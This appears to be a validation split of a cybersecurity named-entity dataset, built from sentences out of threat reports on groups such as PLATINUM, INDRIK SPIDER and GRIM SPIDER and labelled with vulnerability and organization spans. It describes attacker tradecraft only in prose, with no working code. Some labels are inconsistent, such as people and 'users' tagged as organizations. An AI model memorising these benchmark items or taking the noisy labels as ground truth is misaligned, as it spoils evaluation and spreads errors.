{"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"Vulnerability: CVE-2015-2545": [[147, 160]]}, "info": {"id": "dnrti_valid_000094", "source": "dnrti_valid"}}
{"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves .", "spans": {"Vulnerability: zero-day exploits": [[37, 54], [289, 306], [358, 375]]}, "info": {"id": "dnrti_valid_000095", "source": "dnrti_valid"}}
{"text": "Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"Organization: Microsoft": [[57, 66]], "Organization: users": [[117, 122]]}, "info": {"id": "dnrti_valid_000096", "source": "dnrti_valid"}}
{"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack .", "spans": {}, "info": {"id": "dnrti_valid_000097", "source": "dnrti_valid"}}
{"text": "After gaining access to a victim 's computer , PLATINUM installs its own custom-built malware to communicate with the compromised system , issue commands , and move laterally through the network .", "spans": {}, "info": {"id": "dnrti_valid_000098", "source": "dnrti_valid"}}
{"text": "PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers .", "spans": {}, "info": {"id": "dnrti_valid_000099", "source": "dnrti_valid"}}
{"text": "This section describes some of the tools used by the group .", "spans": {}, "info": {"id": "dnrti_valid_000100", "source": "dnrti_valid"}}
{"text": "The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations .", "spans": {}, "info": {"id": "dnrti_valid_000101", "source": "dnrti_valid"}}
{"text": "In addition to Dipsind and its variants , PLATINUM uses a few other families of custom-built backdoors within its attack toolset .", "spans": {}, "info": {"id": "dnrti_valid_000102", "source": "dnrti_valid"}}
{"text": "The PLATINUM group has written a few different versions of keyloggers that perform their functions in different ways , most likely to take advantage of different weaknesses in victims ' computing environments .", "spans": {}, "info": {"id": "dnrti_valid_000103", "source": "dnrti_valid"}}
{"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets .", "spans": {}, "info": {"id": "dnrti_valid_000104", "source": "dnrti_valid"}}
{"text": "Both groups can set permissions on specific files to Everyone , and work in tandem with the PLATINUM backdoors .", "spans": {}, "info": {"id": "dnrti_valid_000105", "source": "dnrti_valid"}}
{"text": "In particular , this second group also has the capability of dumping users ' credentials using the same technique employed by Mimikatz .", "spans": {}, "info": {"id": "dnrti_valid_000106", "source": "dnrti_valid"}}
{"text": "In addition to using several publicly known injection methods to perform this task , it also takes advantage of an obscure operating system feature known as hot patching .", "spans": {}, "info": {"id": "dnrti_valid_000107", "source": "dnrti_valid"}}
{"text": "One of PLATINUM 's most recent and interesting tools is meant to inject code into processes using a variety of injection techniques .", "spans": {}, "info": {"id": "dnrti_valid_000108", "source": "dnrti_valid"}}
{"text": "Hot patching is an operating system-supported feature for installing updates without having to reboot or restart a process .", "spans": {}, "info": {"id": "dnrti_valid_000110", "source": "dnrti_valid"}}
{"text": "Multiple Dipsind variants have been identified , all of which are believed to be used exclusively by PLATINUM .", "spans": {}, "info": {"id": "dnrti_valid_000111", "source": "dnrti_valid"}}
{"text": "The group 's most frequently used backdoors belong to a malware family that Microsoft has designated Dipsind , although some variants are detected under different names .", "spans": {"Organization: Microsoft": [[76, 85]]}, "info": {"id": "dnrti_valid_000112", "source": "dnrti_valid"}}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation .", "spans": {}, "info": {"id": "dnrti_valid_000113", "source": "dnrti_valid"}}
{"text": "PLATINUM has used several zero-day exploits against their victims .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]]}, "info": {"id": "dnrti_valid_000114", "source": "dnrti_valid"}}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 .", "spans": {}, "info": {"id": "dnrti_valid_000115", "source": "dnrti_valid"}}
{"text": "PLATINUM has consistently targeted victims within a small set of countries in South and Southeast Asia .", "spans": {}, "info": {"id": "dnrti_valid_000116", "source": "dnrti_valid"}}
{"text": "PLATINUM has developed or commissioned a number of custom tools to provide the group with access to victim resources .", "spans": {}, "info": {"id": "dnrti_valid_000117", "source": "dnrti_valid"}}
{"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking .", "spans": {}, "info": {"id": "dnrti_valid_000118", "source": "dnrti_valid"}}
{"text": "Take advantage of native mitigations built into Windows 10 .", "spans": {}, "info": {"id": "dnrti_valid_000119", "source": "dnrti_valid"}}
{"text": "For example , the summer 2015 attack that used the unusual ' resume ' would not have been successful on Windows 10 as-is because of the presence of the Supervisor Mode Execution Prevention ( SMEP ) mitigation , even without the latest security updates installed .", "spans": {}, "info": {"id": "dnrti_valid_000120", "source": "dnrti_valid"}}
{"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": {"Vulnerability: CVE-2015-2546": [[8, 21]]}, "info": {"id": "dnrti_valid_000121", "source": "dnrti_valid"}}
{"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": {"Vulnerability: zero-day vulnerability": [[18, 40]], "Vulnerability: CVE-2015-2545": [[51, 64]]}, "info": {"id": "dnrti_valid_000122", "source": "dnrti_valid"}}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel® Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication .", "spans": {"Organization: Microsoft": [[29, 38]]}, "info": {"id": "dnrti_valid_000123", "source": "dnrti_valid"}}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication .", "spans": {"Organization: Microsoft": [[29, 38]]}, "info": {"id": "dnrti_valid_000124", "source": "dnrti_valid"}}
{"text": "Until this incident , no malware had been discovered misusing the AMT SOL feature for communication .", "spans": {}, "info": {"id": "dnrti_valid_000125", "source": "dnrti_valid"}}
{"text": "We confirmed that the tool did not expose vulnerabilities in the management technology itself , but rather misused AMT SOL within target networks that have already been compromised to keep communication stealthy and evade security applications .", "spans": {}, "info": {"id": "dnrti_valid_000126", "source": "dnrti_valid"}}
{"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse .", "spans": {}, "info": {"id": "dnrti_valid_000127", "source": "dnrti_valid"}}
{"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia—PLATINUM is known to customize tools based on the network architecture of targeted organizations .", "spans": {}, "info": {"id": "dnrti_valid_000128", "source": "dnrti_valid"}}
{"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks .", "spans": {}, "info": {"id": "dnrti_valid_000129", "source": "dnrti_valid"}}
{"text": "Another possibility is that the targeted systems did not have AMT provisioned and PLATINUM , once they've obtained administrative privileges on the system , proceeded to provision AMT .", "spans": {}, "info": {"id": "dnrti_valid_000130", "source": "dnrti_valid"}}
{"text": "During the provisioning process , PLATINUM could select whichever username and password they wish .", "spans": {}, "info": {"id": "dnrti_valid_000131", "source": "dnrti_valid"}}
{"text": "The PLATINUM tool is , to our knowledge , the first malware sample observed to misuse chipset features in this way .", "spans": {}, "info": {"id": "dnrti_valid_000133", "source": "dnrti_valid"}}
{"text": "Microsoft reiterates that the PLATINUM tool does not expose flaws in Intel® Active Management Technology ( AMT ) , but uses the technology within an already compromised network to evade security monitoring tools .", "spans": {"Organization: Microsoft": [[0, 9]]}, "info": {"id": "dnrti_valid_000134", "source": "dnrti_valid"}}
{"text": "The discovery of this new PLATINUM technique and the development of detection capabilities highlight the work the Windows Defender ATP team does to provide customers greater visibility into suspicious activities transpiring on their networks .", "spans": {"Organization: Windows Defender ATP": [[114, 134]]}, "info": {"id": "dnrti_valid_000135", "source": "dnrti_valid"}}
{"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": {"Vulnerability: zero-day exploits": [[131, 148]]}, "info": {"id": "dnrti_valid_000136", "source": "dnrti_valid"}}
{"text": "This signals just how long ago the Poseidon threat actor was already working on its offensive framework .", "spans": {}, "info": {"id": "dnrti_valid_000137", "source": "dnrti_valid"}}
{"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor .", "spans": {}, "info": {"id": "dnrti_valid_000138", "source": "dnrti_valid"}}
{"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools .", "spans": {}, "info": {"id": "dnrti_valid_000139", "source": "dnrti_valid"}}
{"text": "The Poseidon Group is a long-running team operating on all domains : land , air , and sea .", "spans": {}, "info": {"id": "dnrti_valid_000140", "source": "dnrti_valid"}}
{"text": "The Poseidon Group has been active , using custom code and evolving their toolkit since at least 2005 .", "spans": {}, "info": {"id": "dnrti_valid_000141", "source": "dnrti_valid"}}
{"text": "Poseidon has maintained a consistently evolving toolkit since the mid-2000s .", "spans": {}, "info": {"id": "dnrti_valid_000142", "source": "dnrti_valid"}}
{"text": "The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": {"Organization: executives": [[188, 198]]}, "info": {"id": "dnrti_valid_000143", "source": "dnrti_valid"}}
{"text": "PROMETHIUM is an activity group that has been active as early as 2012 .", "spans": {}, "info": {"id": "dnrti_valid_000144", "source": "dnrti_valid"}}
{"text": "This malware family is known as \" PittyTiger \" by the anti-virus community .", "spans": {"Organization: anti-virus community": [[54, 74]]}, "info": {"id": "dnrti_valid_000145", "source": "dnrti_valid"}}
{"text": "NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird .", "spans": {"Organization: Microsoft": [[83, 92]]}, "info": {"id": "dnrti_valid_000146", "source": "dnrti_valid"}}
{"text": "The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"Organization: specific individuals": [[247, 267]], "Organization: institutions": [[272, 284]], "Organization: intelligence agencies": [[328, 349]]}, "info": {"id": "dnrti_valid_000147", "source": "dnrti_valid"}}
{"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers .", "spans": {}, "info": {"id": "dnrti_valid_000148", "source": "dnrti_valid"}}
{"text": "PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": {}, "info": {"id": "dnrti_valid_000149", "source": "dnrti_valid"}}
{"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": {"Vulnerability: CVE-2016-4117": [[101, 114]]}, "info": {"id": "dnrti_valid_000150", "source": "dnrti_valid"}}
{"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal .", "spans": {}, "info": {"id": "dnrti_valid_000151", "source": "dnrti_valid"}}
{"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family .", "spans": {"Organization: Microsoft": [[26, 35]]}, "info": {"id": "dnrti_valid_000152", "source": "dnrti_valid"}}
{"text": "Unit 61486 is the 12th Bureau of the PLA 's 3rd General Staff Department ( GSD ) and is headquartered in Shanghai , China .", "spans": {}, "info": {"id": "dnrti_valid_000153", "source": "dnrti_valid"}}
{"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 .", "spans": {"Organization: CrowdStrike": [[4, 15]]}, "info": {"id": "dnrti_valid_000154", "source": "dnrti_valid"}}
{"text": "The CrowdStrike Intelligence team has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 .", "spans": {"Organization: CrowdStrike Intelligence": [[4, 28]]}, "info": {"id": "dnrti_valid_000155", "source": "dnrti_valid"}}
{"text": "This particular unit is believed to hack into victim companies throughout the world in order to steal corporate trade secrets , primarily relating to the satellite , aerospace and communication industries .", "spans": {}, "info": {"id": "dnrti_valid_000156", "source": "dnrti_valid"}}
{"text": "Parts of the PUTTER PANDA toolset and tradecraft have been previously documented , both by CrowdStrike , and in open source , where they are referred to as the MSUpdater group .", "spans": {"Organization: CrowdStrike": [[91, 102]]}, "info": {"id": "dnrti_valid_000157", "source": "dnrti_valid"}}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries .", "spans": {"Organization: Technology sectors": [[144, 162]]}, "info": {"id": "dnrti_valid_000158", "source": "dnrti_valid"}}
{"text": "According to the hacking collective , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {}, "info": {"id": "dnrti_valid_000159", "source": "dnrti_valid"}}
{"text": "The folders seem to contain information about the company 's development documentation , artificial intelligence model , web security software , and antivirus software base code .", "spans": {}, "info": {"id": "dnrti_valid_000160", "source": "dnrti_valid"}}
{"text": "Targeting antivirus companies appears to have been the primary goal of Fxmps' latest network intrusions .", "spans": {"Organization: antivirus companies": [[10, 29]]}, "info": {"id": "dnrti_valid_000161", "source": "dnrti_valid"}}
{"text": "This period started with their seeming disappearance in October 2018 and concluded with their return in April 2019 .", "spans": {}, "info": {"id": "dnrti_valid_000162", "source": "dnrti_valid"}}
{"text": "The hacker 's name is Gnosticplayers , and since February 11 the hacker has put up for sale data for 32 companies in three rounds [stories on Round 1 , Round 2 , and Round 3] on Dream Market , a dark web marketplace .", "spans": {}, "info": {"id": "dnrti_valid_000163", "source": "dnrti_valid"}}
{"text": "But according to Gnosticplayers , his foray into a public marketplace like Dream has two goals --besides the first and obvious one being money .", "spans": {}, "info": {"id": "dnrti_valid_000164", "source": "dnrti_valid"}}
{"text": "Data collected by Secureworks incident response ( IR ) analysts and analyzed by CTU researchers indicates that GOLD LOWELL extorts money from victims using the custom SamSam ransomware .", "spans": {"Organization: Secureworks": [[18, 29]], "Organization: CTU": [[80, 83]]}, "info": {"id": "dnrti_valid_000165", "source": "dnrti_valid"}}
{"text": "Some sources claimed that GOLD LOWELL operations specifically targeted the healthcare vertical following public SamSam incidents in 2016 and 2018 .", "spans": {}, "info": {"id": "dnrti_valid_000166", "source": "dnrti_valid"}}
{"text": "However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft .", "spans": {"Organization: CTU": [[10, 13]]}, "info": {"id": "dnrti_valid_000167", "source": "dnrti_valid"}}
{"text": "In January 2017 , GOLD LOWELL began targeting legitimate RDP account credentials , in some cases discovering and compromising accounts using brute-force techniques .", "spans": {}, "info": {"id": "dnrti_valid_000168", "source": "dnrti_valid"}}
{"text": "In 2015 and 2016 , GOLD LOWELL frequently exploited JBoss enterprise applications using several versions of this open-source JBoss exploitation tool .", "spans": {}, "info": {"id": "dnrti_valid_000169", "source": "dnrti_valid"}}
{"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing .", "spans": {}, "info": {"id": "dnrti_valid_000170", "source": "dnrti_valid"}}
{"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality .", "spans": {}, "info": {"id": "dnrti_valid_000171", "source": "dnrti_valid"}}
{"text": "Gold Lowell then provide a download link to a unique XML executable file and corresponding RSA private key to decrypt the files .", "spans": {}, "info": {"id": "dnrti_valid_000172", "source": "dnrti_valid"}}
{"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell .", "spans": {}, "info": {"id": "dnrti_valid_000173", "source": "dnrti_valid"}}
{"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past .", "spans": {}, "info": {"id": "dnrti_valid_000174", "source": "dnrti_valid"}}
{"text": "Similar to Samas and BitPaymer , Ryuk is specifically used to target enterprise environments .", "spans": {}, "info": {"id": "dnrti_valid_000175", "source": "dnrti_valid"}}
{"text": "Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release .", "spans": {}, "info": {"id": "dnrti_valid_000176", "source": "dnrti_valid"}}
{"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors .", "spans": {}, "info": {"id": "dnrti_valid_000177", "source": "dnrti_valid"}}
{"text": "However , Ryuk is only used by GRIM SPIDER and , unlike Hermes , Ryuk has only been used to target enterprise environments .", "spans": {}, "info": {"id": "dnrti_valid_000178", "source": "dnrti_valid"}}
{"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD .", "spans": {}, "info": {"id": "dnrti_valid_000179", "source": "dnrti_valid"}}
{"text": "Hermes ransomware , the predecessor to Ryuk , was first distributed in February 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000180", "source": "dnrti_valid"}}
{"text": "In mid-August 2018 , a modified version of Hermes , dubbed Ryuk , started appearing in a public malware repository .", "spans": {}, "info": {"id": "dnrti_valid_000181", "source": "dnrti_valid"}}
{"text": "Ryuk was tailored to target enterprise environments and some of the modifications include removing anti-analysis checks .", "spans": {}, "info": {"id": "dnrti_valid_000182", "source": "dnrti_valid"}}
{"text": "As mentioned in the Hermes to Ryuk section , Ryuk uses a combination of symmetric ( AES ) and asymmetric ( RSA ) encryption to encrypt files .", "spans": {}, "info": {"id": "dnrti_valid_000183", "source": "dnrti_valid"}}
{"text": "For each mounted drive , Ryuk calls GetDriveTypeW to determine the drive 's type .", "spans": {}, "info": {"id": "dnrti_valid_000184", "source": "dnrti_valid"}}
{"text": "To retrieve IP addresses that have ARP entries , Ryuk calls GetIpNetTable .", "spans": {}, "info": {"id": "dnrti_valid_000185", "source": "dnrti_valid"}}
{"text": "Open-source reporting has claimed that the Hermes ransomware was developed by the North Korean group STARDUST CHOLLIMA ( activities of which have been public reported as part of the \" Lazarus Group \" ) , because Hermes was executed on a host during the SWIFT compromise of FEIB in October 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000186", "source": "dnrti_valid"}}
{"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000188", "source": "dnrti_valid"}}
{"text": "Based on these factors , there is considerably more evidence supporting the hypothesis that the GRIM SPIDER threat actors are Russian speakers and not North Korean .", "spans": {}, "info": {"id": "dnrti_valid_000189", "source": "dnrti_valid"}}
{"text": "The hackers also started tweeting a few samples of internal emails from the company .", "spans": {}, "info": {"id": "dnrti_valid_000190", "source": "dnrti_valid"}}
{"text": "From a process and file perspective , Hermes and Ryuk target files in a similar fashion .", "spans": {}, "info": {"id": "dnrti_valid_000191", "source": "dnrti_valid"}}
{"text": "Claudio Guarnieri , a security researcher who has investigated Hacking Team along with others at the Citizen Lab , was quick to point this out .", "spans": {"Organization: Claudio Guarnieri": [[0, 17]], "Organization: Citizen Lab": [[101, 112]]}, "info": {"id": "dnrti_valid_000192", "source": "dnrti_valid"}}
{"text": "The breach on Hacking Team comes almost a year after another surveillance tech company , the competing FinFisher , was hacked in a similar way , with a hacker leaking 40 Gb of internal files .", "spans": {"Organization: FinFisher": [[103, 112]]}, "info": {"id": "dnrti_valid_000193", "source": "dnrti_valid"}}
{"text": "Their software , once surreptitiously installed on a target 's cell phone or computer , can be used to monitor the target 's communications , such as phone calls , text messages , Skype calls , or emails .", "spans": {}, "info": {"id": "dnrti_valid_000194", "source": "dnrti_valid"}}
{"text": "In 2015 and 2016 , Dridex was one of the most prolific eCrime banking trojans on the market and , since 2014 , those efforts are thought to have netted INDRIK SPIDER millions of dollars in criminal profits .", "spans": {}, "info": {"id": "dnrti_valid_000195", "source": "dnrti_valid"}}
{"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) .", "spans": {}, "info": {"id": "dnrti_valid_000196", "source": "dnrti_valid"}}
{"text": "The targeting of an organization rather than individuals , and the high ransom demands , made BitPaymer stand out from other contemporary ransomware at the time .", "spans": {}, "info": {"id": "dnrti_valid_000197", "source": "dnrti_valid"}}
{"text": "Though the encryption and ransom functionality of BitPaymer was not technically sophisticated , the malware contained multiple anti-analysis features that overlapped with Dridex .", "spans": {}, "info": {"id": "dnrti_valid_000198", "source": "dnrti_valid"}}
{"text": "Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER , suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy .", "spans": {}, "info": {"id": "dnrti_valid_000199", "source": "dnrti_valid"}}
{"text": "The beginning of 2017 also brought a turning point in INDRIK SPIDER 's operation of Dridex .", "spans": {}, "info": {"id": "dnrti_valid_000200", "source": "dnrti_valid"}}
{"text": "CrowdStrike® Falcon® Intelligence™ also observed a strong correlation between Dridex infections and BitPaymer ransomware .", "spans": {"Organization: CrowdStrike® Falcon® Intelligence™": [[0, 34]]}, "info": {"id": "dnrti_valid_000201", "source": "dnrti_valid"}}
{"text": "During incidents that involved BitPaymer , Dridex was installed on the victim network prior to the deployment of the BitPaymer malware .", "spans": {}, "info": {"id": "dnrti_valid_000202", "source": "dnrti_valid"}}
{"text": "Also unusual was the observation that both Dridex and BitPaymer were spread through the victim network using lateral movement techniques traditionally associated with nation-state actors and penetration testing .", "spans": {}, "info": {"id": "dnrti_valid_000203", "source": "dnrti_valid"}}
{"text": "The information gathered from these engagements , combined with information from prior Dridex IR engagements , provides insight into how INDRIK SPIDER deploys and operates both Dridex and BitPaymer .", "spans": {}, "info": {"id": "dnrti_valid_000204", "source": "dnrti_valid"}}
{"text": "In recent BitPaymer IR engagements , Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser .", "spans": {"Organization: Falcon Intelligence": [[37, 56]]}, "info": {"id": "dnrti_valid_000205", "source": "dnrti_valid"}}
{"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity .", "spans": {}, "info": {"id": "dnrti_valid_000206", "source": "dnrti_valid"}}
{"text": "This web hosting service provider continues to be the hosting provider of choice for the threat actors behind NetTraveler .", "spans": {"Organization: web hosting service provider": [[5, 33]], "Organization: hosting provider": [[54, 70]]}, "info": {"id": "dnrti_valid_000207", "source": "dnrti_valid"}}
{"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting .", "spans": {}, "info": {"id": "dnrti_valid_000208", "source": "dnrti_valid"}}
{"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware .", "spans": {}, "info": {"id": "dnrti_valid_000209", "source": "dnrti_valid"}}
{"text": "The report authors renamed the malware \" FriedEx \" .", "spans": {}, "info": {"id": "dnrti_valid_000210", "source": "dnrti_valid"}}
{"text": "Falcon Intelligence has analyzed this malware and can confirm the overlap between BitPaymer/FriedEx and Dridex malware .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000211", "source": "dnrti_valid"}}
{"text": "Though there is no functionality to collect this information in the ransomware itself , the ransomware is deployed by INDRIK SPIDER in parallel with Dridex malware , and the Dridex malware contains modules that may be used to collect information from infected hosts .", "spans": {}, "info": {"id": "dnrti_valid_000212", "source": "dnrti_valid"}}
{"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000213", "source": "dnrti_valid"}}
{"text": "Unlike many ransomware operations , which usually just require victims to make the payment and subsequently download a decryptor , INDRIK SPIDER requires the victim to engage in communication with an operator .", "spans": {}, "info": {"id": "dnrti_valid_000214", "source": "dnrti_valid"}}
{"text": "Falcon Intelligence has had unique insight into the email dialogue between a victim and an INDRIK SPIDER operator .", "spans": {"Organization: Falcon Intelligence": [[0, 19]]}, "info": {"id": "dnrti_valid_000215", "source": "dnrti_valid"}}
{"text": "Initial victim communication with the INDRIK SPIDER operator , using one of the email addresses provided , results in the operator providing key pieces of information up front , such as the BTC address and the ransom amount .", "spans": {}, "info": {"id": "dnrti_valid_000216", "source": "dnrti_valid"}}
{"text": "It was made clear during communications that INDRIK SPIDER is not willing to negotiate on the ransom amount , explicitly stating that the victim can use multiple Bitcoin exchanges to obtain the number of BTC required , and the exchange rate should be calculated based on the rate posted on the cryptocurrency exchange Bittrex .", "spans": {}, "info": {"id": "dnrti_valid_000217", "source": "dnrti_valid"}}
{"text": "Of note , INDRIK SPIDER specifies the geographical location of where the victim should seek help , confirming that they know key information about the victim .", "spans": {}, "info": {"id": "dnrti_valid_000218", "source": "dnrti_valid"}}
{"text": "INDRIK SPIDER uses file sharing platforms to distribute the BitPaymer decryptor .", "spans": {}, "info": {"id": "dnrti_valid_000219", "source": "dnrti_valid"}}
{"text": "In an extensive email to the victim , the INDRIK SPIDER operator provides a decryptor download link , decryptor deletion link ( to be used following decryptor download ) and a password .", "spans": {}, "info": {"id": "dnrti_valid_000220", "source": "dnrti_valid"}}
{"text": "The recommendations provided are not only good advice , but also provide indications of how INDRIK SPIDER breaches organizations and moves laterally until domain controller access is gained .", "spans": {}, "info": {"id": "dnrti_valid_000221", "source": "dnrti_valid"}}
{"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization .", "spans": {}, "info": {"id": "dnrti_valid_000222", "source": "dnrti_valid"}}
{"text": "INDRIK SPIDER consists of experienced malware developers and operators who have likely been part of the group since the early days of Dridex operations , beginning in June 2014 .", "spans": {}, "info": {"id": "dnrti_valid_000223", "source": "dnrti_valid"}}
{"text": "The formation of the group and the modus operandi changed significantly in early 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000224", "source": "dnrti_valid"}}
{"text": "Dridex operations became more targeted , resulting in less distribution and Dridex sub-botnets in operation , and BitPaymer ransomware operations began in July 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000225", "source": "dnrti_valid"}}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for Indrik Spider , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan .", "spans": {}, "info": {"id": "dnrti_valid_000226", "source": "dnrti_valid"}}
{"text": "There is no doubt that BitPaymer ransomware operations are proving successful for this criminal group , with an average estimate take of over $200,000 USD per victim , but it is also important to remember that INDRIK SPIDER continues to operate the Dridex banking trojan .", "spans": {}, "info": {"id": "dnrti_valid_000227", "source": "dnrti_valid"}}
{"text": "Though Dridex is still bringing in criminal revenue for the actor after almost four years of operation , targeted wire fraud operations likely require lengthy planning .", "spans": {}, "info": {"id": "dnrti_valid_000228", "source": "dnrti_valid"}}
{"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead .", "spans": {}, "info": {"id": "dnrti_valid_000229", "source": "dnrti_valid"}}
{"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; The first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER .", "spans": {}, "info": {"id": "dnrti_valid_000230", "source": "dnrti_valid"}}
{"text": "Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands .", "spans": {}, "info": {"id": "dnrti_valid_000231", "source": "dnrti_valid"}}
{"text": "In July 2017 , INDRIK SPIDER joined the movement of targeted ransomware with BitPaymer .", "spans": {}, "info": {"id": "dnrti_valid_000232", "source": "dnrti_valid"}}
{"text": "Most recently , the ransomware known as Ryuk came to market in August 2017 and has netted its operators , tracked by Falcon Intelligence as GRIM SPIDER , a significant ( and immediate ) profit in campaigns also targeting large organizations .", "spans": {"Organization: Falcon Intelligence": [[117, 136]]}, "info": {"id": "dnrti_valid_000233", "source": "dnrti_valid"}}
{"text": "The LUNAR SPIDER threat group is the Eastern European-based operator and developer of the commodity banking malware called BokBot ( aka IcedID ) , which was first observed in April 2017 .", "spans": {}, "info": {"id": "dnrti_valid_000235", "source": "dnrti_valid"}}
{"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function .", "spans": {}, "info": {"id": "dnrti_valid_000236", "source": "dnrti_valid"}}
{"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 .", "spans": {"Organization: CrowdStrike Intelligence": [[70, 94]]}, "info": {"id": "dnrti_valid_000237", "source": "dnrti_valid"}}
